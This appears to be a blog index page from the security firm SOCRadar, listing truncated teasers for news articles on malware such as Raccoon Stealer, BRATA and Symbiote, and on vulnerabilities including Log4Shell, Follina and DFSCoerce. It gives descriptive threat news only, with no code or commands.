Latest articles from SOCRadar
A short while ago, combined security advice released by several national cybersecurity agencies highlighted the top ten attack vectors most used by threat actors to access networks. Threat actors take advantage of outdated systems, external… Continue Reading
We are hearing these two buzzwords, DevSecOps and DevOps, more frequently. For example, Gartner predicts DevSecOps will reach mainstream adoption within two to five years, which means that we will hear about them even more… Continue Reading
Microsoft reported that hundreds of businesses' networks have already been compromised by the Windows worm Raspberry Robin. Multiple security experts discovered Raspberry Robin in 2021. Microsoft even saw evidence from 2019. Raspberry Robin acts like… Continue Reading
Cybercrime is a threat that closely concerns public authorities, companies, and residents in Denmark, as it is around the world. The fact that threat actors adapt rapidly to the "new normal," improve their skills and… Continue Reading
The cyber security agenda is shaken every day with brand new threats and methods developed by malicious actors. We see the effects of the developments in these attack techniques in countries where capital accumulation is intense,… Continue Reading
The new version of Raccoon Stealer has been released. The first version was first seen in 2019 and served as MaaS (malware-as-a-service.) The malware ceased operations on March 25, following the death of one of… Continue Reading
Network Performance Monitoring (NPM) is assessing the service quality of a network as experienced by users by measuring, visualizing, monitoring, diagnosing, optimizing, and reporting on it. NPM aims to identify congestion, maximize throughput, and improve… Continue Reading
The newly emerged Android banking trojan Revive mimics BBVA bank's two-factor authentication app. Although still in early development, the malware is capable of phishing attacks and account takeover via keyloggers. According to Cleafy's research, when the trojan… Continue Reading
Cybersecurity researchers have discovered that some Python packages available in the PyPI repositories engage in malicious activity. Malicious packets send some sensitive data, including AWS login credentials, to internet-facing endpoints. In May, malicious activities were… Continue Reading
The Log4Shell RCE vulnerability with code CVE-2021-44228 continues to be exploited by state-backed threat actors. Attackers utilize the vulnerability to target VMware Horizon and Unified Access Gateway servers. By exploiting the Log4Shell vulnerability, attackers can gain… Continue Reading
Have you ever wondered how hackers find the IPs, ports, and services required for their attacks? Some attacks need thousands of host computers to find the vulnerable ones. Hackers do not require sophisticated tools to… Continue Reading
Today, with the effects of digitalization, most of the information is stored online. This situation creates a vulnerability for organizations because the number of cyberattacks is increasing daily to steal those data. One example of… Continue Reading
A new DFSCoerce NTLM Relay attack has been discovered on Windows. Threat actors can take over Microsoft Active Directory Certificate Services (AD CS) domains using MS-DFSNM (Microsoft Distributed File System Namespace Management). To take over… Continue Reading
SOCRadar will be at InfoSecurity Europe, held at London ExCel this week from 21 to 23 June. We are very excited to meet you face to face at our booth V38. Visit us to gain… Continue Reading
Originally a banking trojan, BRATA acquires new capabilities and becomes a more advanced threat. Malware can now be much more effective at stealing user information. Cleafy's analysis shows BRATA's activities are almost identical to APT activity… Continue Reading
Cybersecurity researchers have revealed that Sophos Firewall has been actively exploited by DriftingCloud APT group since early March. Apparently, the attacks started long before the CVE-2022-1040 vulnerability was patched, affecting v18.5 and older versions of… Continue Reading
Cisco fixed a vulnerability discovered in the external authentication functionality of Secure Email and Web Manager. The vulnerability could allow threat actors to bypass authentication and log on to the web. The vulnerability tracked as… Continue Reading
Microsoft has released the June 2022 Patch Tuesday. The company announced that it had patched 55 vulnerabilities, including the CVE-2022-30190 vulnerability, nicknamed Follina, which affects Office products. Among the fixed vulnerabilities, 27 RCE and 12… Continue Reading
The newly discovered Linux malware Symbiote can easily infect and hide in almost any process on compromised systems. The malware steals account credentials and gives malicious actors backdoor access. Symbiote is stored in the system after… Continue Reading
The Kingdom of Saudi Arabia (KSA) has launched a digital transformation program focusing on the banking industry. With the growing digitization of financial services, securing the availability of sensitive data, transactions, and services has become… Continue Reading